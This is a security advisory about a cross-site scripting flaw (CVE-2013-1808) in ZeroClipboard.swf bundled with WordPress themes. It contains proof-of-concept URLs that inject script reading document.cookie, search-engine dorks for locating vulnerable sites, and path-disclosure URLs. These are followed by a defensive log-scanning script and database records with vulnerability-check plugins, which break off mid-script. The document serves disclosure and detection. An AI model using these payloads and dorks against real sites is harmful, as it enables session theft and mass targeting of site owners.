ZeroClipbord.swf Cross Site Scripting / Path Disclosure
2013-04-09T00:00:00
ID: PACKETSTORM:121174 | Type: packetstorm | Reporter: MustLive | Modified: 2013-04-09T00:00:00
Description
Hello list!
These are Cross-Site Scripting and Full Path Disclosure vulnerabilities in
multiple WordPress themes that bundle ZeroClipboard.swf.
Earlier I wrote about Cross-Site Scripting vulnerabilities in
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote
that this is a very widespread Flash file, present on tens of thousands
of web sites and used in hundreds of web applications.
After publishing this and two other ZeroClipboard-related advisories in
February, last month I published two new advisories (prepared in
February) about vulnerabilities in WP plugins and WP themes that ship
ZeroClipboard.swf.
This Flash file is used in hundreds of WordPress themes (including
custom themes for individual sites), among them Montezuma, Striking,
Couponpress, Azolla, and Black and White. There are many other vulnerable
WP themes with ZeroClipboard.swf, and one theme also contains
ZeroClipboard10.swf.
SecurityVulns ID: 12910
CVE: CVE-2013-1808
-------------------------
Affected products:
-------------------------
The following web applications (WordPress themes) with ZeroClipboard
are vulnerable:
All versions of Montezuma, Striking, Couponpress, Azolla, and Black and White.
Both XSS vulnerabilities in ZeroClipboard are fixed in the latest version,
ZeroClipboard 1.1.7. All developers should update the swf file in their
software. I wrote about developers who have begun fixing these
vulnerabilities in ZeroClipboard in their software
(http://seclists.org/fulldisclosure/2013/Mar/207).
----------
Details:
----------
Cross-Site Scripting (WASC-08):
XSS via the id parameter, and XSS via copying a payload into the clipboard
buffer (as described in the previous advisory).
http://site/wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/themes/couponpress/template_couponpress/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/themes/azolla/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/themes/black-and-white/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
This is a very widespread Flash file (both versions), as Google dorks show.
While a standard Google dork finds tens of thousands of sites with
ZeroClipboard.swf or ZeroClipboard10.swf, searching specifically for
WordPress themes finds hundreds of thousands of sites with these Flash files.
inurl:zeroclipboard.swf inurl:/wp-content/themes/ - about 70200 (in February, now more)
zeroclipboard.swf inurl:/wp-content/themes/ - about 85600 (in February, now more)
Full path disclosure (WASC-13):
All of the mentioned themes have FPD vulnerabilities in their PHP files
(index.php and others), which is typical for WP themes.
http://site/wp-content/themes/montezuma/
http://site/wp-content/themes/striking/
http://site/wp-content/themes/couponpress/
http://site/wp-content/themes/azolla/
http://site/wp-content/themes/black-and-white/
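An added example (not from MustLive's advisory or the ZeroClipboard project) that turns the two indicators above into a defender's log check: it parses Combined Log Format access log lines, flags requests to ZeroClipboard.swf or ZeroClipboard10.swf whose id parameter is not a plain DOM element id, and flags direct requests to a theme's root or index.php, which is what triggers the FPD. The log lines, client addresses and the id value ZeroClipboardMovie_1 are constructed; the second sample line reuses the advisory's own PoC query string.

```python
"""Scan web server access logs (Combined Log Format) for the two probes
described in the advisory: the ZeroClipboard.swf id-parameter XSS and
direct requests to WordPress theme files that trigger full path disclosure."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format: ip ident user [timestamp] "METHOD target HTTP/x.y" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+" (?P<status>\d{3}) \S+'
)
# Both file names mentioned in the advisory, matched case-insensitively.
SWF_RE = re.compile(r'/ZeroClipboard(?:10)?\.swf$', re.IGNORECASE)
# ZeroClipboard receives the id of a DOM element in its flashvars; a legitimate
# value is an HTML id token. Quotes, braces or parentheses never belong there.
SAFE_ID_RE = re.compile(r'^[A-Za-z0-9_.:-]*$')
# A theme's root or index.php requested directly runs the template without
# WordPress loaded; the resulting PHP error prints the absolute path of the
# file, which is the full path disclosure (WASC-13) described above.
THEME_ROOT_RE = re.compile(r'^/wp-content/themes/[^/]+/(?:index\.php)?$')


def classify_request(target):
    """Return (rule, evidence) for a suspicious request target, else None."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if SWF_RE.search(path):
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get('id', []):
            if not SAFE_ID_RE.match(value):
                return ('zeroclipboard-xss-probe', value)
        return None
    if THEME_ROOT_RE.match(path):
        return ('theme-fpd-probe', path)
    return None


def scan_log(lines):
    """Parse each log line and collect findings with client, status and evidence."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line in the expected format (e.g. truncated)
        hit = classify_request(match.group('target'))
        if hit is None:
            continue
        findings.append({
            'ip': match.group('ip'),
            'time': match.group('ts'),
            'status': int(match.group('status')),
            'rule': hit[0],
            'evidence': hit[1],
            'target': match.group('target'),
        })
    return findings


# Constructed sample log lines (client addresses from documentation ranges).
# Line 2 carries the advisory's PoC query string, line 3 a direct theme-root
# request; lines 1 and 4 are ordinary traffic and must not be flagged.
SAMPLE_LOG = [
    '198.51.100.4 - - [09/Apr/2013:10:14:55 +0000] "GET /wp-content/themes/montezuma/admin/'
    'ZeroClipboard.swf?id=ZeroClipboardMovie_1&width=110&height=14 HTTP/1.1" 200 3211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Apr/2013:10:15:02 +0000] "GET /wp-content/themes/montezuma/admin/'
    'ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height'
    ' HTTP/1.1" 200 3211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Apr/2013:10:15:09 +0000] "GET /wp-content/themes/striking/ HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Apr/2013:10:15:30 +0000] "GET /wp-content/themes/striking/style.css HTTP/1.1" 200 18231 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print('{rule}: {ip} -> {target} (HTTP {status})'.format(**finding))
```

A 200 on a flagged theme-root request is worth following up on the server itself: with PHP's display_errors enabled, that response body is where the filesystem path leaks.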
------------
Timeline:
------------
2013.02.19 - after contacting the old and new developers of ZeroClipboard,
I disclosed the vulnerabilities in ZeroClipboard to the lists.
2013.02 - in February I wrote two additional advisories about
vulnerabilities in different web applications with ZeroClipboard, to draw
more attention to this issue, which concerns hundreds of web applications.
2013.03.28 - disclosed the vulnerabilities in multiple WordPress themes at
my site (http://websecurity.com.ua/6401/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
"sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-06-29T19:23:13", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - coupon-code-plugin <= 2.1 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6753", "href": "https://wpvulndb.com/vulnerabilities/6753", "type": "wpvulndb", "title": "coupon-code-plugin <= 2.1 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-06-29T19:23:17", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - wp-link-to-us <= 2.0 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6756", "href": "https://wpvulndb.com/vulnerabilities/6756", "type": "wpvulndb", "title": "wp-link-to-us <= 2.0 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-06-29T19:23:14", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - WP Clone by WP Academy <= 2.1.1 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6761", "href": "https://wpvulndb.com/vulnerabilities/6761", "type": "wpvulndb", "title": "WP Clone by WP Academy <= 2.1.1 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:37", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2034", "CVE-2013-2033", "CVE-2013-1808"], "description": "\nJenkins Security Advisory reports:\n\nThis advisory announces multiple security vulnerabilities that\n\t were found in Jenkins core.\n\n\nSECURITY-63 / CVE-2013-2034\nThis creates a cross-site request forgery (CSRF) vulnerability\n\t\t on Jenkins 
master, where an anonymous attacker can trick an\n\t\t administrator to execute arbitrary code on Jenkins master by\n\t\t having him open a specifically crafted attack URL.\nThere's also a related vulnerability where the permission\n\t\t check on this ability is done imprecisely, which may affect\n\t\t those who are running Jenkins instances with a custom\n\t\t authorization strategy plugin.\n\n\nSECURITY-67 / CVE-2013-2033\nThis creates a cross-site scripting (XSS) vulnerability, where\n\t\t an attacker with a valid user account on Jenkins can execute\n\t\t JavaScript in the browser of other users, if those users are\n\t\t using certain browsers.\n\n\nSECURITY-69 / CVE-2013-2034\nThis is another CSRF vulnerability that allows an attacker to\n\t\t cause a deployment of binaries to Maven repositories. This\n\t\t vulnerability has the same CVE ID as SEUCRITY-63.\n\n\nSECURITY-71 / CVE-2013-1808\nThis creates a cross-site scripting (XSS) vulnerability.\n\n\n\n", "edition": 4, "modified": "2013-05-02T00:00:00", "published": "2013-05-02T00:00:00", "id": "622E14B1-B40C-11E2-8441-00E0814CAB4E", "href": "https://vuxml.freebsd.org/freebsd/622e14b1-b40c-11e2-8441-00e0814cab4e.html", "title": "jenkins -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-10-18T15:24:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2034", "CVE-2013-2033", "CVE-2013-1808"], "description": "This host is installed with Jenkins and is\n prone to cross-site request forgery and cross-site scripting vulnerabilities.", "modified": "2019-10-17T00:00:00", "published": "2016-07-14T00:00:00", "id": "OPENVAS:1361412562310807348", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807348", "type": "openvas", "title": "Jenkins CSRF And XSS Vulnerabilities (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# 
Jenkins CSRF And XSS Vulnerabilities (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807348\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2013-2034\", \"CVE-2013-2033\", \"CVE-2013-1808\");\n script_bugtraq_id(59631, 59634, 58257);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-14 13:00:47 +0530 (Thu, 14 Jul 2016)\");\n\n script_name(\"Jenkins CSRF And XSS Vulnerabilities (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jenkins and is\n prone to cross-site request forgery and cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A cross-site request forgery (CSRF) flaw in the 
Jenkins master, where an\n anonymous attacker can trick an administrator to execute arbitrary code on\n Jenkins master by having him open a specifically crafted attack URL.\n\n - The multiple input validation errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on Jenkins master by having him open a\n specifically crafted attack URL and to execute JavaScript in the browser of other users.\");\n\n script_tag(name:\"affected\", value:\"Jenkins main line prior to 1.514, Jenkins LTS prior to 1.509.1.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 1.514,\n Jenkins LTS users should update to 1.509.1.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2013-05-02/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! 
version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"1.509.1\" ) ) {\n vuln = TRUE;\n fix = \"1.509.1\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"1.514\" ) ) {\n vuln = TRUE;\n fix = \"1.514\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:25:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2034", "CVE-2013-2033", "CVE-2013-1808"], "description": "This host is installed with Jenkins and is\n prone to cross-site request forgery and cross-site scripting vulnerabilities.", "modified": "2019-10-17T00:00:00", "published": "2016-07-14T00:00:00", "id": "OPENVAS:1361412562310807349", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807349", "type": "openvas", "title": "Jenkins CSRF And XSS Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins CSRF And XSS Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807349\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2013-2034\", \"CVE-2013-2033\", \"CVE-2013-1808\");\n script_bugtraq_id(59631, 59634, 58257);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-14 13:00:47 +0530 (Thu, 14 Jul 2016)\");\n\n script_name(\"Jenkins CSRF And XSS Vulnerabilities (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jenkins and is\n prone to cross-site request forgery and cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A cross-site request forgery (CSRF) flaw in the Jenkins master, where an\n anonymous attacker can trick an administrator to execute arbitrary code on\n Jenkins master by having him open a specifically crafted attack URL.\n\n - The multiple input validation errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on Jenkins master by having him open a\n specifically crafted attack URL and to execute JavaScript in the browser of other users.\");\n\n script_tag(name:\"affected\", value:\"Jenkins main line prior to 1.514, Jenkins LTS prior to 1.509.1.\");\n\n 
script_tag(name:\"solution\", value:\"Jenkins main line users should update to 1.514,\n Jenkins LTS users should update to 1.509.1.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2013-05-02/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"1.509.1\" ) ) {\n vuln = TRUE;\n fix = \"1.509.1\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"1.514\" ) ) {\n vuln = TRUE;\n fix = \"1.514\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T03:19:11", "description": "The remote web server hosts a version of Jenkins or Jenkins Enterprise\nthat is affected by multiple vulnerabilities :\n\n - The included component 'ZeroClipboard' contains an\n error in the file 'ZeroClipboard10.swf' that could\n allow cross-site scripting attacks.\n (CVE-2013-1808)\n\n - An unspecified cross-site scripting error exists.\n (CVE-2013-2033)\n\n - Multiple errors exist that could lead to 
cross-site\n request forgery attacks, thus allowing an attacker to\n trick an administrator into executing arbitrary code.\n (CVE-2013-2034)", "edition": 26, "published": "2013-06-14T00:00:00", "title": "Jenkins < 1.514 / 1.509.1 and Jenkins Enterprise 1.466.x / 1.480.x < 1.466.14.1 / 1.480.4.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2034", "CVE-2013-2033", "CVE-2013-1808"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:cloudbees:jenkins"], "id": "JENKINS_1_514.NASL", "href": "https://www.tenable.com/plugins/nessus/66898", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66898);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2013-1808\", \"CVE-2013-2033\", \"CVE-2013-2034\");\n script_bugtraq_id(58257, 59631, 59634);\n\n script_name(english:\"Jenkins < 1.514 / 1.509.1 and Jenkins Enterprise 1.466.x / 1.480.x < 1.466.14.1 / 1.480.4.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks Jenkins version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a job scheduling / management system that\nis affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server hosts a version of Jenkins or Jenkins Enterprise\nthat is affected by multiple vulnerabilities :\n\n - The included component 'ZeroClipboard' contains an\n error in the file 'ZeroClipboard10.swf' that could\n allow cross-site scripting attacks.\n (CVE-2013-1808)\n\n - An unspecified cross-site scripting error exists.\n (CVE-2013-2033)\n\n - Multiple errors exist that could lead to cross-site\n request forgery attacks, thus allowing an attacker to\n trick an administrator into executing arbitrary code.\n (CVE-2013-2034)\");\n # https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2013-05-02\n 
script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?832b8cbc\");\n # https://www.cloudbees.com/jenkins-security-advisory-2013-05-02\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?13462b17\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Jenkins 1.514 / 1.509.1, Jenkins Enterprise 1.466.14.1 /\n1.480.4.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2034\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cloudbees:jenkins\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"jenkins_detect.nasl\");\n script_require_keys(\"www/Jenkins\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\n\nget_kb_item_or_exit(\"www/Jenkins/\"+port+\"/Installed\");\n\n# Check if install is Enterprise\nenterprise_installed = get_kb_item(\"www/Jenkins/\"+port+\"/enterprise/Installed\");\nif (!isnull(enterprise_installed)) appname = \"Jenkins Enterprise by CloudBees\";\nelse appname = \"Jenkins Open Source\";\n\nurl = build_url(qs:'/', port:port);\n\nversion = get_kb_item_or_exit(\"www/Jenkins/\"+port+\"/JenkinsVersion\");\nif (version == \"unknown\") audit(AUDIT_UNKNOWN_WEB_APP_VER, appname, url);\nif (report_paranoia < 2 && isnull(enterprise_installed)) audit(AUDIT_PARANOID);\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\nif (max_index(ver) < 2) exit(0, \"The version information of the \"+appname+\" install at \"+url+\" is not granular enough.\");\n\nif (\n report_paranoia > 1 && isnull(enterprise_installed) &&\n (\n ver_compare(ver:version, fix:'1.509.1', strict:FALSE) < 0 || # LTS version\n (\n ver[0] == 1 && ver[1] > 509 && ver[1] < 514 && # flag vulnerable major version releases,\n max_index(ver) < 3 # but not future LTS releases\n )\n )\n)\n{\n vuln = TRUE;\n fixed = \"1.514 / 1.509.1\";\n}\n\n# Check Enterprise ranges\nif (\n enterprise_installed &&\n (\n # All previous\n (ver[0] < 1 || (ver[0] == 1 && ver[1] < 466))\n ||\n # 1.466.x < 1.466.14.1\n (ver[0] == 1 && ver[1] == 466 && (ver[2] < 14 || (ver[2] == 14 && ver[3] < 1)))\n ||\n # 1.480.x < 1.480.4.1\n (ver[0] == 1 && ver[1] == 480 && (ver[2] < 4 || (ver[2] == 4 && ver[3] < 1)))\n )\n)\n{\n vuln = TRUE;\n fixed = \"1.466.14.1 / 1.480.4.1\";\n}\n\nif (vuln)\n{\n set_kb_item(name:\"www/\"+port+\"/XSRF\", value:TRUE);\n 
set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Product : ' + appname +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:44:52", "description": "Jenkins Security Advisory reports :\n\nThis advisory announces multiple security vulnerabilities that were\nfound in Jenkins core.\n\n- SECURITY-63 / CVE-2013-2034\n\nThis creates a cross-site request forgery (CSRF) vulnerability on\nJenkins master, where an anonymous attacker can trick an administrator\nto execute arbitrary code on Jenkins master by having him open a\nspecifically crafted attack URL.\n\nThere's also a related vulnerability where the permission check on\nthis ability is done imprecisely, which may affect those who are\nrunning Jenkins instances with a custom authorization strategy plugin.\n\n- SECURITY-67 / CVE-2013-2033\n\nThis creates a cross-site scripting (XSS) vulnerability, where an\nattacker with a valid user account on Jenkins can execute JavaScript\nin the browser of other users, if those users are using certain\nbrowsers.\n\n- SECURITY-69 / CVE-2013-2034\n\nThis is another CSRF vulnerability that allows an attacker to cause a\ndeployment of binaries to Maven repositories. 
This vulnerability has\nthe same CVE ID as SEUCRITY-63.\n\n- SECURITY-71 / CVE-2013-1808\n\nThis creates a cross-site scripting (XSS) vulnerability.", "edition": 22, "published": "2013-05-04T00:00:00", "title": "FreeBSD : jenkins -- multiple vulnerabilities (622e14b1-b40c-11e2-8441-00e0814cab4e)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2034", "CVE-2013-2033", "CVE-2013-1808"], "modified": "2013-05-04T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:jenkins"], "id": "FREEBSD_PKG_622E14B1B40C11E2844100E0814CAB4E.NASL", "href": "https://www.tenable.com/plugins/nessus/66311", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66311);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-1808\", \"CVE-2013-2033\", \"CVE-2013-2034\");\n\n script_name(english:\"FreeBSD : jenkins -- multiple vulnerabilities (622e14b1-b40c-11e2-8441-00e0814cab4e)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n 